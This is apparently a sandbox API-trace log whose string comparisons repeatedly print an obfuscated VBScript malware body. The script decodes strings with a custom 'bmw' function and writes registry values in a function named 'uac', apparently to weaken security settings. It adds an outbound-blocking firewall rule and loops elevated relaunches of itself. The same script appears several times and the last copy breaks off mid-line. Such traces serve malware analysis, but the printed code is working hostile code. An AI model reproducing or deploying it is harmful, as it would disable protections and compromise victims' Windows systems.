bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.369] wcsncmp (_String1=".Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.369] wcsncmp (_String1="Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.369] wcsncmp (_String1="escription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.369] wcsncmp (_String1="scription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.370] wcsncmp (_String1="cription = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 